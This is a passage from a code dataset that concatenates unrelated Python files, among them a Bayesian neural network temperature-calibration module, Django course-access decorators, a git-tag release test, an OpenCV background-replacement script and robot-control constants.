        accuracy = 100. * np.sum(pred_labels == labels) / num_samples
    else:
        accuracy = None

    if return_pred_labels:
        assert pred_labels.size == X.shape[0]
        return_vals.pred_labels = pred_labels

    if return_entropies:
        # We use the "maximum" trick to improve numerical stability.
        return_vals.entropies = - np.sum(pred_dists * \
                                         np.log(np.maximum(pred_dists, 1e-5)),
                                         axis=1)
        # return_vals.entropies = - np.sum(pred_dists * np.log(pred_dists),
        #                                  axis=1)
        assert return_vals.entropies.size == X.shape[0]

        # Normalize by maximum entropy.
        max_ent = - np.log(1.0 / data.num_classes)
        return_vals.entropies /= max_ent

    if return_confidence:
        return_vals.confidence = np.max(pred_dists, axis=1)
        assert return_vals.confidence.size == X.shape[0]

    if return_agreement:
        # Agreement = mean (over classes) std (over models) of the softmax
        # outputs; low values mean the models agree.
        return_vals.agreement = softmax_outputs.std(axis=0).mean(axis=1)
        assert return_vals.agreement.size == X.shape[0]

    return accuracy, return_vals
def estimate_implicit_moments(config, shared, task_id, hnet, hhnet, num_samples,
                              device):
    """Estimate the first two moments of an implicit distribution.

    This function takes the implicit distribution represented by ``hnet`` and
    estimates the mean and the variances of its outputs.

    Args:
        config (argparse.Namespace): Command-line arguments.
        shared (argparse.Namespace): Miscellaneous data shared among training
            functions.
        task_id (int): In case ``hhnet`` is provided, this will be used to
            select the task embedding.
        hnet: The hypernetwork.
        hhnet: The hyper-hypernetwork, may be ``None``.
        num_samples: The number of samples that should be drawn from the
            ``hnet`` to estimate the statistics.
        device: The PyTorch device.

    Returns:
        (tuple): Tuple containing:

        - **sample_mean** (torch.Tensor): Estimated mean of the implicit
          distribution.
        - **sample_std** (torch.Tensor): Estimated standard deviation of the
          implicit distribution.
    """
    # If a hyper-hypernet is given, it provides the hnet weights for this task.
    theta = hhnet.forward(cond_id=task_id) if hhnet is not None else None

    # Draw `num_samples` flattened weight samples from the implicit
    # distribution.
    drawn = []
    for _ in range(num_samples):
        noise = torch.normal(torch.zeros(1, shared.noise_dim),
                             config.latent_std).to(device)
        sample = hnet.forward(uncond_input=noise, weights=theta)
        drawn.append(torch.cat([t.detach().flatten() for t in sample]))
    samples = torch.stack(drawn, dim=0).to(device)

    return samples.mean(dim=0), samples.std(dim=0)
def process_dis_batch(config, shared, batch_size, device, dis, hnet, hnet_theta,
                      dist=None):
    """Process a batch of weight samples via the discriminator.

    Args:
        config (argparse.Namespace): Command-line arguments.
        shared (argparse.Namespace): Miscellaneous data shared among training
            functions.
        batch_size (int): How many samples should be fed through the
            discriminator.
        device: PyTorch device.
        dis: Discriminator.
        hnet: The hypernetwork, representing an implicit distribution from
            which to sample weights. Is only used to draw samples if
            ``dist`` is ``None``.
        hnet_theta: The weights passed to ``hnet`` when drawing samples.
        dist (torch.distributions.normal.Normal): A normal distribution,
            from which discriminator inputs can be sampled.

    Returns:
        (tuple): Tuple containing:

        - **dis_out** (torch.Tensor): The discriminator output for the given
          batch of samples.
        - **dis_input** (torch.Tensor): The samples that have been passed
          through the discriminator.
    """
    if dist is None:
        # Draw flattened weight samples from the implicit distribution.
        assert hnet is not None
        latent = torch.normal(torch.zeros(batch_size, shared.noise_dim),
                              config.latent_std).to(device)
        dis_input = hnet.forward(uncond_input=latent, weights=hnet_theta,
                                 ret_format='flattened')
    else:
        dis_input = dist.sample([batch_size])
        if hnet is not None:
            assert np.all(np.equal(dis_input.shape,
                                   [batch_size, hnet.num_outputs]))

    if config.use_batchstats:
        # Append batch statistics (means/stds) to the discriminator input.
        dis_input = gan.concat_mean_stats(dis_input)

    return dis.forward(dis_input), dis_input
def calc_prior_matching(config, shared, batch_size, device, dis, hnet,
                        theta_current, dist_prior, dist_ac,
                        return_current_samples=False):
    """Calculate the prior-matching term.

    Args:
        config (argparse.Namespace): Command-line arguments.
        shared (argparse.Namespace): Miscellaneous data shared among training
            functions.
        batch_size (int): How many samples should be fed through the
            discriminator.
        device: PyTorch device.
        dis: Discriminator.
        hnet: The hypernetwork, representing an implicit distribution from
            which to sample weights. Is used to draw samples from the current
            implicit distribution ``theta_current`` (which may be ``None`` if
            internal weights should be selected).
        theta_current: The weights passed to ``hnet`` when drawing samples from
            the current implicit distribution that should be matched to the
            prior (can be ``None`` if internally maintaned weights of ``hnet``
            should be used).
        dist_prior (torch.distributions.normal.Normal): A normal distribution,
            that represents an explicit prior. Only used if ``dist_ac`` is
            not ``None``.
        dist_ac (torch.distributions.normal.Normal): A normal distribution,
            that can be passed if the adaptive contrast trick is used. If not
            ``None``, then ``dist_prior`` may not be ``None``.
        return_current_samples (bool): If ``True``, the samples collected from
            the current implicit distribution are returned.

    Returns:
        (tuple): Tuple containing:

        - **loss_pm**: (torch.Tensor): The unscaled loss value for the
          prior-matching term.
        - **curr_samples** (list): List of samples drawn from the implicit
          distribution ``hnet`` (using ``theta_current``).
    """
    assert dist_ac is None or dist_prior is not None

    curr_samples = [] if return_current_samples else None

    # Draw `batch_size` flattened samples from the current implicit
    # distribution.
    # FIXME Create batch of samples rather than looping.
    flat_samples = torch.empty((batch_size, hnet.num_outputs)).to(device)
    for i in range(batch_size):
        noise = torch.normal(torch.zeros(1, shared.noise_dim),
                             config.latent_std).to(device)
        sample = hnet.forward(uncond_input=noise, weights=theta_current)
        flat_samples[i, :] = torch.cat([t.flatten() for t in sample])
        if curr_samples is not None:
            curr_samples.append(sample)

    # The following two terms are only required if the adaptive-contrast
    # trick is used.
    log_prob_ac = 0
    log_prob_prior = 0
    if dist_ac is not None:
        log_prob_ac = dist_ac.log_prob(flat_samples).sum(dim=1).mean()
        log_prob_prior = dist_prior.log_prob(flat_samples).sum(dim=1).mean()

    dis_in = gan.concat_mean_stats(flat_samples) if config.use_batchstats \
        else flat_samples
    value_t = dis.forward(dis_in).mean()

    return value_t + log_prob_ac - log_prob_prior, curr_samples
def calc_batch_uncertainty(config, shared, task_id, device, inputs, mnet, hnet,
                           hhnet, data, num_w_samples, hnet_theta=None,
                           allowed_outputs=None):
    """Compute the per-sample uncertainties for a given batch of inputs.

    Note:
        This function is executed inside a ``torch.no_grad()`` context.

    Args:
        config (argparse.Namespace): Command-line arguments.
        shared: Miscellaneous data shared among training functions (softmax
            temperature is stored in here).
        task_id (int): In case a hypernet ``hnet`` is given, the ``task_id`` is
            used to load the corresponding main network ``mnet`` weights.
        device: PyTorch device.
        inputs (torch.Tensor): A batch of main network ``mnet`` inputs.
        mnet: The main network.
        hnet (optional): The implicit hypernetwork, can be ``None``.
        hhnet (optional): The hyper-hypernetwork, can be ``None``.
        data: Dataset loader. Needed to determine the number of classes.
        num_w_samples (int): The number of weight samples that should be drawn
            to estimate predictive uncertainty.
        hnet_theta (tuple, optional): To save computation, one can pass
            weights for the implicit hypernetwork ``hnet``, if they have been
            computed prior to calling this methods.
        allowed_outputs (tuple, optional): The indices of the neurons belonging
            to outputs head ``task_id``. Only needs to be specified in a
            multi-head setting.

    Returns:
        (numpy.ndarray): The entropy of the estimated predictive distribution
        per input sample (normalized by the maximum possible entropy).
    """
    assert data.classification
    assert config.cl_scenario == 2 or allowed_outputs is not None
    assert hhnet is None or hnet is not None

    # FIXME We calibrate the temperature after training on a task. This
    # function is currently only used to track batch uncertainty during
    # training or to choose coreset samples with maximum uncertainty on a
    # single model (note, the relative order of uncertain samples doesn't
    # change due to calibration for a single model). Hence, the function is
    # invoked before the temperature is optimized. The assertion below guards
    # against future misuse after calibration.
    assert shared.softmax_temp[task_id] == 1.
    temp = shared.softmax_temp[task_id]

    with torch.no_grad():
        if hnet_theta is None and hhnet is not None:
            hnet_theta = hhnet.forward(cond_id=task_id)

        num_outs = data.num_classes if allowed_outputs is None \
            else len(allowed_outputs)

        softmaxes = np.empty((num_w_samples, inputs.shape[0], num_outs))

        mnet_kwargs = pmutils.mnet_kwargs(config, task_id, mnet)
        for s in range(num_w_samples):
            sampled_weights = None
            if hnet is not None:
                noise = torch.normal(torch.zeros(1, shared.noise_dim),
                                     config.latent_std).to(device)
                sampled_weights = hnet.forward(uncond_input=noise,
                                               weights=hnet_theta)

            logits = mnet.forward(inputs, weights=sampled_weights,
                                  **mnet_kwargs)
            if allowed_outputs is not None:
                logits = logits[:, allowed_outputs]
            softmaxes[s, :, :] = F.softmax(logits / temp, dim=1).detach(). \
                cpu().numpy()

        # Predictive distribution per sample.
        pred_dists = softmaxes.mean(axis=0)

        # We use the "maximum" trick to improve numerical stability.
        entropies = - np.sum(pred_dists * np.log(np.maximum(pred_dists, 1e-5)),
                             axis=1)
        assert entropies.size == inputs.shape[0]

        # Normalize by maximum entropy.
        max_ent = - np.log(1.0 / data.num_classes)
        return entropies / max_ent
def visualize_implicit_dist(config, task_id, writer, train_iter, w_samples,
                            figsize=(10, 6)):
    """Visualize an implicit distribution.

    Plots (to tensorboard) a Pearson correlation matrix over up to 10 fixed
    weight coordinates of ``w_samples``, plus pairwise joint KDE plots for
    those coordinates.

    Args:
        config: Command-line arguments (unused here beyond the signature).
        task_id (int): Task index used to name the tensorboard figures.
        writer: Tensorboard summary writer.
        train_iter (int): Global step under which figures are logged.
        w_samples (torch.Tensor): 2D tensor, one weight sample per row.
        figsize (tuple): Matplotlib figure size for the correlation plot.
    """
    assert w_samples.ndim == 2
    num_weights = w_samples.shape[1]

    # Ensure that we always plot the same samples, independent of the simulation
    # its random seed.
    rand = np.random.RandomState(42)
    weight_inds = rand.choice(np.arange(num_weights), min(10, num_weights),
                              replace=False)
    weight_inds = np.sort(weight_inds)

    # Column name -> 1D numpy array of samples for that weight coordinate.
    weight_samples = dict(('Weight %d' % (weight_inds[i]),
        w_samples[:, weight_inds[i]].detach().cpu().numpy()) \
        for i in range(len(weight_inds)))

    # FIXME Adapt our plotting guidelines.
    df = pd.DataFrame.from_dict(weight_samples)

    # correlation matrix.
    plt.rcParams['figure.figsize'] = figsize
    plt.matshow(df.corr(method='pearson'), vmin=-1, vmax=1)
    plt.xticks(range(len(df.columns)), df.columns)
    plt.xticks(rotation=70)
    plt.yticks(range(len(df.columns)), df.columns)
    plt.colorbar()
    writer.add_figure('eval/task_%d/correlation' % task_id, plt.gcf(),
                      train_iter, close=True)

    # Pairwise joint plots for the lower triangle (q < p); capped at 10 plots
    # via the counter `n`.
    n = 0
    for p in weight_inds:
        for q in weight_inds:
            if q >= p:
                break
            # Avoid that plots get corrupted due to mode collapse.
            if np.isclose(weight_samples['Weight %d' % p].std(), 0) or \
                    np.isclose(weight_samples['Weight %d' % q].std(), 0):
                n += 1
                warn('Could not create plot "eval/task_%d/weight_%d_%d" ' \
                     % (task_id, p, q) + 'due to mode collapsed posterior ' +
                     'variance.')
                continue
            try:
                sns.jointplot(x='Weight %d' % (p), y='Weight %d' % (q), data=df,
                              kind="kde")
                writer.add_figure('eval/task_%d/weight_%d_%d' % (task_id, p, q),
                                  plt.gcf(), train_iter, close=True)
            except:
                # KDE estimation can fail for degenerate sample sets.
                warn('Could not visualize joint weight density.')
                n += 1
            if n > 9:
                break
        if n > 9:
            break
def calibrate_temperature(task_id, data, mnet, hnet, hhnet, device, config,
                          shared, logger, writer, cal_per_model=False,
                          only_correctly_classified=False,
                          cal_target_entropy=-1):
    """Calibrate softmax temperature for current task.

    When training in a continual learning setting, the loss is a combination
    of task-specific terms and regularizers (which are different for every
    task). These differences in the loss functions used for training will have
    an influence on the (in-distribution) softmax outputs.

    To overcome these differences, we perform a post-hoc calibration step
    using a proper score function (the negative-log likelihood, which is
    identical to the cross-entropy when using 1-hot targets) to learn the
    softmax temperature. Note, high softmax temperatures increase entropy,
    whereas low temperatures increase confidence.

    A proper calibration of each task will ensure that between task comparisons
    become easier.

    Note:
        We calibrate on the training set, as we want our in-distribution
        predictive distributions to be properly calibrated for each task (note,
        tasks are trained using different loss functions since there are
        different regularizers that kick in over time). The only purpose of this
        function is to correct this behavior.

    Args:
        (....): See docstring of function :func:`train`.
        cal_per_model (bool): By default, we calibrate the predictive
            distriubtion, i.e., the averaged softmax across all models from the
            Bayesian ensemble (depending on ``config.cal_sample_size``). If
            instead we should calibrate individual models from this ensemble,
            this option can be set to ``True`` (note, behavior is the same if
            ``config.cal_sample_size == 1``).
        only_correctly_classified (bool): Only use correctly classified samples
            for the calibration (as determined by the argmax of the predictive
            distribution).
        cal_target_entropy (float): If not ``-1``, then instead of calibrating
            using a proper score function, we learn a temperature such that a
            given target in-distribution entropy is matched (i.e., we compute
            the entropy on a mini-batch and minimize the MSE towards the given
            target entropy). In this way, one can ensure actively that all tasks
            have the same in-distribution entropy.
    """
    logger.info('Temperature calibration for task %d ...' % (task_id+1))

    # FIXME We could also follow the code from
    # https://github.com/gpleiss/temperature_scaling/blob/master/temperature_scaling.py
    # but they don't consider BNNs. Note, there code is much more efficient
    # since they compute the logits before entering the training loop (which
    # is possible when only having one model). Though, in general, we have
    # multiple models.
    set_train_mode(True, mnet, hnet, hhnet, None)

    gauss_main = False
    if isinstance(mnet, GaussianBNNWrapper):
        gauss_main = True

    # Whether the hypernet represents an implicit distribution (i.e., it's
    # input is a random variable), or whether it has task embeddings as input.
    det_hnet = False
    if hnet is not None:
        if hnet.num_known_conds > 0:
            assert hhnet is None
            det_hnet = True
            # Can currently only be the case if we train a BbB setup with option
            # `mean_only` enabled.
            if not gauss_main:
                assert hasattr(config, 'mean_only') and config.mean_only

    # The single parameter to be tuned by this method.
    temp_param = torch.nn.Parameter(shared.softmax_temp[task_id],
                                    requires_grad=True)
    assert temp_param == 1.

    # Which temperature transfer function to use during training. Note, this
    # can ensure that temperatures don't become negative.
    # ttf = temperature transfer function
    ttf_choice = 'softplus'
    if ttf_choice == 'linear':
        ttf = lambda x : x
        #torch.nn.init.ones_(temp_param.data)
    elif ttf_choice == 'exp':
        ttf = torch.exp
        torch.nn.init.zeros_(temp_param.data)
    else:
        ttf = F.softplus
        # Initialize such that softplus(temp_param) == 1.
        temp_param.data = torch.log(torch.exp(torch.ones(1)) - \
                                    torch.ones(1)).to(device)

    allowed_outputs = pmutils.out_units_of_task(config, data, task_id,
                                                config.num_tasks)

    optimizer = tutils.get_optimizer([temp_param], config.lr,
        momentum=config.momentum, weight_decay=config.weight_decay,
        use_adam=config.use_adam, adam_beta1=config.adam_beta1,
        use_rmsprop=config.use_rmsprop, use_adadelta=config.use_adadelta,
        use_adagrad=config.use_adagrad)

    mnet_kwargs = pmutils.mnet_kwargs(config, task_id, mnet)

    num_w_samples = config.train_sample_size if config.cal_sample_size == -1 \
        else config.cal_sample_size

    with torch.no_grad():
        # We don't change any network parameters, so these calls produce
        # constant outputs.
        theta_current = None
        if hhnet is not None:
            theta_current = hhnet.forward(cond_id=task_id)
            theta_current = [p.detach() for p in theta_current]

        if gauss_main:
            assert hhnet is None
            if hnet is not None:
                hnet_out = hnet.forward(cond_id=task_id)
            else:
                hnet_out = None
            w_mean, w_rho = mnet.extract_mean_and_rho(weights=hnet_out)
            w_std = putils.decode_diag_gauss(w_rho,
                logvar_enc=mnet.logvar_encoding)
        elif det_hnet:
            w_mean = hnet.forward(cond_id=task_id)

        ### We first compute the logit outputs over all samples for all models,
        ### since they don't change anymore.
        # FIXME Could lead to memory issues for large datasets and might not be
        # inefficient if ``config.cal_temp_iter`` is small, since we won't
        # iterate over the whole dataset.
        inputs = data.get_train_inputs()
        targets = data.get_train_outputs()

        T = data.output_to_torch_tensor(targets, device, mode='train')

        # Modify 1-hot encodings according to CL scenario.
        assert T.shape[1] == data.num_classes
        # In CL1, CL2 and CL3 (with seperate heads) we do not have to modify the
        # targets.
        if config.cl_scenario == 3 and not config.split_head_cl3:
            raise NotImplementedError('Temperature calibration not ' +
                                      'implemented for CL3 without split-head.')

        _, labels = torch.max(T, 1) # Integer labels.
        #labels = labels.detach()

        num_samples = inputs.shape[0]

        logit_outputs = torch.empty((num_w_samples, num_samples, T.shape[1])). \
            to(device)

        for j in range(num_w_samples):
            if gauss_main: # Gaussian weight posterior.
                # In case of the local-reparam trick, we anyway have a different
                # weight per sample. So, the demand of having the same model for
                # all samples in the dataset drops.
                if config.local_reparam_trick:
                    # Note, the sampling will happen inside the forward method.
                    weights = None
                    emean = w_mean
                    erho = w_rho
                else:
                    weights = putils.sample_diag_gauss(w_mean, w_std,
                        is_radial=config.radial_bnn)
                    emean = None
                    erho = None
            elif det_hnet:
                weights = w_mean
            else:
                if hnet is not None: # Implicit hypernetwork.
                    z = torch.normal(torch.zeros(1, shared.noise_dim),
                                     config.latent_std).to(device)
                    weights = hnet.forward(uncond_input=z,
                                           weights=theta_current)
                else: # Main network only training.
                    weights = None

            # I use the validation batch size on purpose, since it is usually
            # bigger and we just want to quickly compute the logits.
            curr_bs = config.val_batch_size
            n_processed = 0

            while n_processed < num_samples:
                if n_processed + curr_bs > num_samples:
                    curr_bs = num_samples - n_processed
                n_processed += curr_bs

                sind = n_processed - curr_bs
                eind = n_processed

                ### Compute negative log-likelihood (NLL).
                X = data.input_to_torch_tensor(inputs[sind:eind, :], device,
                                               mode='train')

                if gauss_main:
                    Y = mnet.forward(X, weights=None, mean_only=False,
                        extracted_mean=emean, extracted_rho=erho,
                        sample=weights, **mnet_kwargs)
                else:
                    Y = mnet.forward(X, weights=weights, **mnet_kwargs)

                if allowed_outputs is not None:
                    Y = Y[:, allowed_outputs]

                logit_outputs[j, sind:eind, :] = Y

        # Since we computed all training logits, we might as well compute
        # the training accuracy on the predictive distributions at temperature 1
        # (note, temperature doesn't change predicted labels).
        pred_dists = F.softmax(logit_outputs, dim=2).mean(dim=0)
        assert pred_dists.ndim == 2
        _, pred_labels = torch.max(pred_dists, 1)
        train_acc = 100. * torch.sum(pred_labels == labels) / num_samples
        logger.debug('Task %d -- training accuracy: %.2f%%.' % \
                     (task_id+1, train_acc))

        log_pred_dists = torch.log(torch.clamp(pred_dists, min=1e-5))
        in_entropies = -torch.sum(pred_dists * log_pred_dists, dim=1)
        # Normalize by maximum entropy.
        max_ent = - np.log(1.0 / data.num_classes)
        in_entropies /= max_ent

        in_entropies_mean = in_entropies.mean()
        in_entropies_std = in_entropies.std()
        logger.debug('Task %d -- training in-dist. entropy: %f.' % \
                     (task_id+1, in_entropies_mean))

        if not hasattr(shared, 'train_in_ent_mean'):
            shared.train_in_ent_mean = []
            shared.train_in_ent_std = []
        shared.train_in_ent_mean.append( \
            in_entropies_mean.detach().cpu().numpy())
        shared.train_in_ent_std.append(in_entropies_std.detach().cpu().numpy())

        if only_correctly_classified:
            num_correct = torch.sum(pred_labels == labels)
            logger.info('Task %d -- only using %d/%d correctly classified ' \
                        % (task_id+1, num_correct, num_samples) + \
                        'samples for calibration.')
            logit_outputs = logit_outputs[:, pred_labels == labels, :]
            num_samples = num_correct
            assert logit_outputs.shape[1] == num_correct
            labels = labels[pred_labels == labels]
            assert labels.shape[0] == num_correct

            # Sanity check!
            pred_dists = F.softmax(logit_outputs, dim=2).mean(dim=0)
            _, pred_labels = torch.max(pred_dists, 1)
            assert torch.sum(pred_labels == labels) == num_correct

    logit_outputs = logit_outputs.detach()

    ### Calibrate temperature.
    for i in range(config.cal_temp_iter):
        optimizer.zero_grad()

        batch_inds = np.random.randint(0, num_samples, config.batch_size)
        batch_logits = logit_outputs[:, batch_inds, :]
        batch_labels = labels[batch_inds]
        assert batch_logits.ndim == 3

        # Note, this first option is more numerically stable when calibrating
        # NLL.
        if cal_per_model or num_w_samples == 1:
            loss = 0
            for j in range(num_w_samples):
                if cal_target_entropy != -1:
                    batch_sm = F.softmax(batch_logits[j, :, :] / \
                                         ttf(temp_param), dim=1)
                    # For numerical stability.
                    batch_log_sm = torch.log(torch.clamp(batch_sm, min=1e-5))
                    # Mean entropy within the batch.
                    batch_entropy = -torch.sum(batch_sm * batch_log_sm,
                                               dim=1).mean()
                    loss += (batch_entropy - cal_target_entropy)**2
                else: # Compute NLL loss
                    # Note, softmax will be computed inside the `cross_entropy`.
                    loss += F.cross_entropy( \
                        batch_logits[j, :, :] / ttf(temp_param), batch_labels,
                        reduction='mean')
            loss /= num_w_samples
        else:
            batch_pred_dist = F.softmax(batch_logits / ttf(temp_param),
                                        dim=2).mean(dim=0)
            # FIXME nll_loss expects log_softmax as input. To compute the
            # predictive distribution, we have to first average softmax outputs
            # before we can apply the log, which might lead to numerical
            # instabilities.
            #batch_log_pd = batch_pred_dist
            #batch_log_pd[batch_pred_dist < 1e-5] = 1e-5
            batch_log_pd = torch.clamp(batch_pred_dist, min=1e-5)
            batch_log_pd = torch.log(batch_log_pd)
            if cal_target_entropy != -1:
                # Mean entropy within the batch.
                batch_entropy = -torch.sum(batch_pred_dist * batch_log_pd,
                                           dim=1).mean()
                # BUGFIX: `loss` is undefined at this point in this branch, so
                # it must be assigned (the previous `loss += ...` raised an
                # UnboundLocalError on the first iteration).
                loss = (batch_entropy - cal_target_entropy)**2
            else: # Compute NLL loss
                loss = F.nll_loss(batch_log_pd, batch_labels, reduction='mean')

        loss.backward()
        if config.clip_grad_value != -1:
            torch.nn.utils.clip_grad_value_(optimizer.param_groups[0]['params'],
                                            config.clip_grad_value)
        elif config.clip_grad_norm != -1:
            torch.nn.utils.clip_grad_norm_(optimizer.param_groups[0]['params'],
                                           config.clip_grad_norm)
        optimizer.step()

        if ttf_choice == 'linear':
            # NOTE In this case, nothing prevents the temperature from going
            # negative (e.g., when starting with a large learning rate).
            # Therefore, we have to actively capture this case.
            temp_param.data = torch.clamp(temp_param, min=1e-5)

        if i % 50 == 0:
            writer.add_scalar('cal/task_%d/loss' % task_id, loss, i)
            writer.add_scalar('cal/task_%d/temp' % task_id,
                              ttf(temp_param), i)

    final_temp = ttf(temp_param).data
    shared.softmax_temp[task_id] = final_temp.data

    logger.info('Calibrated softmax temperature of task %d is: %f.' % \
                (task_id+1, final_temp))
    logger.info('Temperature calibration for task %d ... Done' % (task_id+1))
if __name__ == '__main__':
    # Library module -- nothing to do when executed directly.
    pass
| StarcoderdataPython |
3251121 | <reponame>honeyhugh/PythonCurso
# Tuple of sample words; for each one, print the vowels it contains.
t = 'pedra', 'papel', 'tesoura', 'garrafa', 'mouse', 'livro'

for word in t:
    print(f'\nNa palavra {word.upper()} as vogais são: ', end='')
    for letter in word:
        if letter in 'aeiou':
            print(letter, end=' ')
| StarcoderdataPython |
1745597 | <reponame>iRomi14/drmlib
# -*- coding: utf-8 -*-
"""
Performs some pre-release checks
"""
import pytest
from tests.conftest import perform_once
def test_changelog_and_version(accelize_drm):
    """
    Checks if Version match with Git tag and if changelog is up to date.
    """
    perform_once(__name__ + '.test_changelog_and_version')

    # Local imports keep collection cheap when the test is skipped.
    from os.path import join
    from subprocess import run, PIPE
    from re import fullmatch

    if not accelize_drm.pytest_build_environment:
        pytest.skip("Can only be checked in build environment")

    # Ensure tags are pulled
    try:
        run(['git', 'fetch', '--tags', '--force'],
            stderr=PIPE, stdout=PIPE, universal_newlines=True)
    except FileNotFoundError:
        # In debug builds a missing git is a hard failure; otherwise xfail.
        fail = (
            pytest.fail if accelize_drm.pytest_build_type == 'debug' else
            pytest.xfail)
        fail('Git is required for this test.')

    # Get head tag if any
    result = run(['git', 'describe', '--abbrev=0', '--exact-match', '--tags',
                  'HEAD'], stderr=PIPE, stdout=PIPE, universal_newlines=True)
    if result.returncode:
        pytest.skip("Can only be checked on tagged git head")
    tag = result.stdout.strip()
    version = tag.lstrip('v')

    # Checks tag format using library version
    lib_ver = accelize_drm.get_api_version()
    # Tag must equal the library version with any "+build" metadata stripped.
    assert tag == 'v%s' % (lib_ver.version.split('+')[0])

    # Check tag format match semantic versioning
    if not fullmatch(r'^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)'
                     r'(-(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)'
                     r'(\.(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*)?'
                     r'(\+[0-9a-zA-Z-]+(\.[0-9a-zA-Z-]+)*)?$', version):
        pytest.fail('"%s" does not match semantic versioning format.' % version)

    # Check if changelog is up-to-date (Not for prereleases)
    if not lib_ver.prerelease:
        changelog_path = join(accelize_drm.pytest_build_source_dir, 'CHANGELOG')
        with open(changelog_path, 'rt') as changelog:
            last_change = changelog.readline().strip()
        # First changelog line must look like "* Mon Jan 01 2020 Accelize vX.Y.Z".
        assert fullmatch(
            r"\* [a-zA-Z]{3} [a-zA-Z]{3} [0-9]{2} [0-9]{4} Accelize " + tag,
            last_change)

    # Check prerelease format:
    # Alpha: "1.0.0-alpha.1"
    # Beta: "1.0.0-beta.1"
    # Release candidate: "1.0.0-rc.1"
    else:
        assert fullmatch(r"(alpha|beta|rc)\.[0-9]+", lib_ver.prerelease)
| StarcoderdataPython |
1732299 | <reponame>WebPowerLabs/django-trainings<gh_stars>0
from functools import wraps
from profiles.models import InstructorProfile
from django.http.response import Http404, HttpResponseRedirect
from courses.models import Course, Content
from lessons.models import Lesson
from resources.models import Resource
from django.core.urlresolvers import reverse
from packages.models import Package
from profiles.models import InfusionsoftProfile
from django.shortcuts import get_object_or_404
from django.contrib.auth.views import redirect_to_login
def purchase_or_instructor_member_required(model):
    """
    Decorator for views. Receives model of content. Returns view if there is no
    package associated with the content or user is a staff or instructor member
    or user has PackagePurchase. Redirects to content purchase page if not.
    """
    # Fail fast on programmer error: only the three content models are valid.
    if model not in [Course, Lesson, Resource]:
        error_message = '{} should be one of the next models [Course, Lesson, Resource]'
        raise ValueError(error_message.format(model))

    def wrapper(view_func):
        @wraps(view_func)
        def check(request, *args, **kwargs):
            user = request.user
            # The decorated view must be routed with a `slug` URL kwarg;
            # unknown slugs produce a 404.
            slug = kwargs.get('slug', None)
            content = get_object_or_404(Content, slug=slug)
            if user.is_authenticated() and user.is_active:
                packages = Package.objects.get_for_content(content)
                # Make sure an Infusionsoft profile exists and refresh its
                # tags before the purchase check.
                profile = InfusionsoftProfile.objects.get_or_create(
                    user=user)[0]
                profile.update_tags()
                purchased_list = model.objects.purchased(user)
                try:
                    instructor = user.instructorprofile
                except InstructorProfile.DoesNotExist:
                    instructor = False
                # Purchasers, staff and instructors get direct access.
                if content in purchased_list or user.is_staff or instructor:
                    return view_func(request, *args, **kwargs)
                # if multiple packages exist return a list of purchase options
                if len(packages) > 1:
                    return HttpResponseRedirect(
                        reverse('packages:list_for_content',
                                kwargs={'content_pk': content.lesson.pk}))
                # if only one exists return the package
                if len(packages) == 1:
                    return HttpResponseRedirect(reverse('packages:detail',
                                                kwargs={'pk': packages[0].pk}))
                else:
                    # No package matched; fall back to the generic
                    # purchase-options page for this content.
                    return HttpResponseRedirect(
                        reverse('packages:list_for_content',
                                kwargs={'content_pk': content.lesson.pk}))
            # Anonymous or inactive users are sent to the login page.
            return redirect_to_login(request.path)
        return check
    return wrapper
def instructor_member_required(view_func):
    """
    Decorator for views that checks that the user is logged in and is a staff
    or instructor member. Raises 404 if not.
    """
    @wraps(view_func)
    def check(request, *args, **kwargs):
        user = request.user
        # Guard clause: anonymous or deactivated accounts never qualify.
        if not (user.is_authenticated() and user.is_active):
            raise Http404
        try:
            instructor = user.instructorprofile
        except InstructorProfile.DoesNotExist:
            instructor = None
        if not (user.is_staff or instructor):
            raise Http404
        return view_func(request, *args, **kwargs)
    return check
def can_edit_content(model):
    """
    Decorator for views that checks that the user is staff or is owner
    of content object. Raises 404 if not.

    Args:
        model: One of the content models ``Course``, ``Lesson`` or
            ``Resource``; the view's ``slug`` kwarg is resolved against it.

    Raises:
        ValueError: If ``model`` is not one of the supported content models.
    """
    if model not in [Course, Lesson, Resource]:
        raise ValueError('{} should be one of the next models [Course, Lesson, Resource]'.format(model))

    def wrapper(view_func):
        @wraps(view_func)
        def check(request, *args, **kwargs):
            user = request.user
            slug = kwargs.get('slug', None)
            # Use get_object_or_404 (consistent with
            # `purchase_or_instructor_member_required`) so an unknown slug
            # yields a 404 instead of an unhandled DoesNotExist (500).
            content = get_object_or_404(model, slug=slug)
            if user.is_authenticated() and user.is_active and \
                    (user.is_staff or content.owner == user):
                return view_func(request, *args, **kwargs)
            raise Http404
        return check
    return wrapper
| StarcoderdataPython |
138660 | <filename>blackScreen.py
import cv2
import numpy as np

# Capture from the default webcam; load the replacement background image.
video = cv2.VideoCapture(0)
image = cv2.imread("me.jpeg")
# BUGFIX: the background must be resized from the loaded image. The original
# code did `image = cv2.resize(frame, ...)` inside the loop, which replaced
# the background with the camera frame (and discarded "me.jpeg" entirely).
# Resizing once up front also avoids redundant work per frame.
background = cv2.resize(image, (640, 480))

while True:
    ret, frame = video.read()
    if not ret:
        # No frame available (camera unplugged / stream ended).
        break
    frame = cv2.resize(frame, (640, 480))
    # BGR bounds of the colour range that is keyed out of the frame.
    u_black = np.array([104, 153, 70])
    l_black = np.array([30, 30, 0])
    mask = cv2.inRange(frame, l_black, u_black)
    res = cv2.bitwise_and(frame, frame, mask=mask)
    # Zero the keyed pixels, then fill those zeros from the background image.
    f = frame - res
    f = np.where(f == 0, background, f)
    cv2.imshow("video", frame)
    cv2.imshow("mask", f)
    # Quit on 'q'.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

video.release()
cv2.destroyAllWindows()
3260110 | <gh_stars>100-1000
# Public re-exports of this package -- presumably Thrift-generated Aurora
# scheduler client modules; confirm against the sibling module files.
__all__ = ['ttypes', 'constants', 'ReadOnlyScheduler', 'AuroraSchedulerManager', 'AuroraAdmin']
| StarcoderdataPython |
4804536 | <reponame>blakermchale/robot-control
#!/usr/bin/env python3
from enum import IntEnum, auto
from ament_index_python.packages import get_package_share_directory
# Get relative package directories
# Absolute share directory of the `robot_control` ROS package.
ROBOT_CONTROL_PKG = get_package_share_directory("robot_control")

# API's and the simulators they work with
# Keys correspond to `ApiType` members and values to `SimType` members
# (lower-cased), declared below.
API_PAIRS = {
    "mavros": ["airsim", "gazebo", "ignition", "none"],
    "inherent": ["airsim", "ignition"],
